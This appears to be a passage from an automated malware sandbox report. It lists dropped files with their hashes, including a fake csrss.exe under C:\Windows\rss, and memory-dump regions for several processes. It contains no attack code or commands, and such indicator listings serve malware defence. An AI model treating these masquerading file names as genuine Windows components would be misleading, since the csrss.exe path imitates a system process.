                                              • C:\Users\Admin\AppData\Local\Temp\db.dll

                                                Filesize

                                                52KB

                                                MD5

                                                0b35335b70b96d31633d0caa207d71f9

                                                SHA1

                                                996c7804fe4d85025e2bd7ea8aa5e33c71518f84

                                                SHA256

                                                ec01d244074f45d4f698f5713147e99d76053824a648b306e1debf69f3ba9ce6

                                                SHA512

                                                ab3d770e99b3f379165863808f3ffc55d64d8e9384a158e6695d7325e97fa1bb570c5088ccdc1d2c3b90df5be11d6722ede15e7b6552bf90e748cb9c28ab94ce

                                              • C:\Users\Admin\AppData\Local\Temp\db.dll

                                                Filesize

                                                52KB

                                                MD5

                                                0b35335b70b96d31633d0caa207d71f9

                                                SHA1

                                                996c7804fe4d85025e2bd7ea8aa5e33c71518f84

                                                SHA256

                                                ec01d244074f45d4f698f5713147e99d76053824a648b306e1debf69f3ba9ce6

                                                SHA512

                                                ab3d770e99b3f379165863808f3ffc55d64d8e9384a158e6695d7325e97fa1bb570c5088ccdc1d2c3b90df5be11d6722ede15e7b6552bf90e748cb9c28ab94ce

                                              • C:\Users\Admin\AppData\Local\Temp\is-5JIIN.tmp\isrojsgj.dll

                                                Filesize

                                                285KB

                                                MD5

                                                2ff45a76d0bbded9f5e5cedd70593dd8

                                                SHA1

                                                252e7645c352a464af7b94d32385271f328812e7

                                                SHA256

                                                7969fee506f8d3c99a1d989eab23c431d3aa47348bffa2859b6d442eb0364d2f

                                                SHA512

                                                d31d5348baa8f9c13340b2b59359174d14191fca63aa6f3f8b7849c0ed41a26be488e77b2fadae423bee962716610c78ed3613255b6a3b7600b8800b6cb674b8

                                              • C:\Users\Admin\AppData\Local\Temp\is-DO5K3.tmp\Files.tmp

                                                Filesize

                                                3.1MB

                                                MD5

                                                895221f44f9274ec3bfd685f6452bb09

                                                SHA1

                                                1253aabdcc292e2f646ed0399de2b18d2421c322

                                                SHA256

                                                a6a27b87d2ae7855f607140d07af3e5cb554029a00da9e8382277f61e2db0ba3

                                                SHA512

                                                c3ff2fb2484e3d8efc5cad96a1ee9f6e653897622fe7c2bd9aa377942cc2731f9321be0334fe68fcf49d814fde2b7c7be9a9c3930ab92a20b5253c03c3d42ac5

                                              • C:\Users\Admin\AppData\Local\Temp\is-EFH7O.tmp\isrojsgj.dll

                                                Filesize

                                                285KB

                                                MD5

                                                2ff45a76d0bbded9f5e5cedd70593dd8

                                                SHA1

                                                252e7645c352a464af7b94d32385271f328812e7

                                                SHA256

                                                7969fee506f8d3c99a1d989eab23c431d3aa47348bffa2859b6d442eb0364d2f

                                                SHA512

                                                d31d5348baa8f9c13340b2b59359174d14191fca63aa6f3f8b7849c0ed41a26be488e77b2fadae423bee962716610c78ed3613255b6a3b7600b8800b6cb674b8

                                              • C:\Users\Admin\AppData\Local\Temp\is-O31RM.tmp\Files.tmp

                                                Filesize

                                                3.1MB

                                                MD5

                                                895221f44f9274ec3bfd685f6452bb09

                                                SHA1

                                                1253aabdcc292e2f646ed0399de2b18d2421c322

                                                SHA256

                                                a6a27b87d2ae7855f607140d07af3e5cb554029a00da9e8382277f61e2db0ba3

                                                SHA512

                                                c3ff2fb2484e3d8efc5cad96a1ee9f6e653897622fe7c2bd9aa377942cc2731f9321be0334fe68fcf49d814fde2b7c7be9a9c3930ab92a20b5253c03c3d42ac5

                                              • C:\Windows\rss\csrss.exe

                                                Filesize

                                                4.0MB

                                                MD5

                                                d688c845c7f0c5672ab61996235899a1

                                                SHA1

                                                e48a046aec461c86ecfb129d576f5032349f536b

                                                SHA256

                                                3a0308e15ea0537d36990b0d1eaa3609eef6e44827a8863233f5a157767077a1

                                                SHA512

                                                6632a8d2761fe52b54be4de8a3d265f2c567eb9dfb2612d1edaace5bfe67e1a2d76dbbbef1900a7dd421bd565da4ef53e7fc672727727909a264d1b037d98089

                                              • C:\Windows\rss\csrss.exe

                                                Filesize

                                                4.0MB

                                                MD5

                                                d688c845c7f0c5672ab61996235899a1

                                                SHA1

                                                e48a046aec461c86ecfb129d576f5032349f536b

                                                SHA256

                                                3a0308e15ea0537d36990b0d1eaa3609eef6e44827a8863233f5a157767077a1

                                                SHA512

                                                6632a8d2761fe52b54be4de8a3d265f2c567eb9dfb2612d1edaace5bfe67e1a2d76dbbbef1900a7dd421bd565da4ef53e7fc672727727909a264d1b037d98089

                                              • memory/896-185-0x0000000000AF9000-0x0000000000B21000-memory.dmp

                                                Filesize

                                                160KB

                                              • memory/2036-199-0x00007FF852640000-0x00007FF853101000-memory.dmp

                                                Filesize

                                                10.8MB

                                              • memory/2036-216-0x00007FF852640000-0x00007FF853101000-memory.dmp

                                                Filesize

                                                10.8MB

                                              • memory/2036-198-0x0000016839810000-0x0000016839832000-memory.dmp

                                                Filesize

                                                136KB

                                              • memory/2532-186-0x0000000000C00000-0x0000000000C2C000-memory.dmp

                                                Filesize

                                                176KB

                                              • memory/2532-187-0x0000000000C00000-0x0000000000C2C000-memory.dmp

                                                Filesize

                                                176KB

                                              • memory/2532-195-0x0000000000C00000-0x0000000000C2C000-memory.dmp

                                                Filesize

                                                176KB

                                              • memory/2532-183-0x0000000000C00000-0x0000000000C2C000-memory.dmp

                                                Filesize

                                                176KB

                                              • memory/2772-191-0x00000000056E0000-0x00000000057EA000-memory.dmp

                                                Filesize

                                                1.0MB

                                              • memory/2772-194-0x0000000005670000-0x00000000056AC000-memory.dmp

                                                Filesize

                                                240KB

                                              • memory/2772-192-0x0000000005610000-0x0000000005622000-memory.dmp

                                                Filesize

                                                72KB

                                              • memory/2772-190-0x0000000005B90000-0x00000000061A8000-memory.dmp

                                                Filesize

                                                6.1MB

                                              • memory/2772-169-0x0000000000400000-0x0000000000428000-memory.dmp

                                                Filesize

                                                160KB

                                              • memory/4240-233-0x0000000000400000-0x0000000000C91000-memory.dmp

                                                Filesize

                                                8.6MB

                                              • memory/4240-229-0x0000000000400000-0x0000000000C91000-memory.dmp

                                                Filesize

                                                8.6MB

                                              • memory/4240-228-0x0000000002990000-0x0000000002D79000-memory.dmp

                                                Filesize

                                                3.9MB

                                              • memory/4396-239-0x0000000000400000-0x0000000000C91000-memory.dmp

                                                Filesize

                                                8.6MB

                                              • memory/4396-238-0x0000000002E00000-0x00000000031E9000-memory.dmp

                                                Filesize

                                                3.9MB

                                              • memory/4396-247-0x0000000000400000-0x0000000000C91000-memory.dmp

                                                Filesize

                                                8.6MB

                                              • memory/4704-174-0x0000000000400000-0x00000000004F8000-memory.dmp

                                                Filesize

                                                992KB

                                              • memory/4704-168-0x0000000000400000-0x00000000004F8000-memory.dmp

                                                Filesize

                                                992KB

                                              • memory/4704-188-0x0000000000400000-0x00000000004F8000-memory.dmp

                                                Filesize

                                                992KB

                                              • memory/4744-161-0x0000000000400000-0x00000000004F8000-memory.dmp

                                                Filesize

                                                992KB

                                              • memory/4744-147-0x0000000000400000-0x00000000004F8000-memory.dmp

                                                Filesize

                                                992KB

                                              • memory/4744-176-0x0000000000400000-0x00000000004F8000-memory.dmp

                                                Filesize

                                                992KB

                                              • memory/4804-140-0x0000000140000000-0x000000014061B000-memory.dmp

                                                Filesize

                                                6.1MB

                                              • memory/5028-184-0x00000000029EC000-0x0000000002DD5000-memory.dmp

                                                Filesize

                                                3.9MB

                                              • memory/5028-189-0x0000000002DE0000-0x0000000003657000-memory.dmp

                                                Filesize

                                                8.5MB

                                              • memory/5028-219-0x0000000000400000-0x0000000000C91000-memory.dmp

                                                Filesize

                                                8.6MB

                                              • memory/5028-193-0x0000000000400000-0x0000000000C91000-memory.dmp

                                                Filesize

                                                8.6MB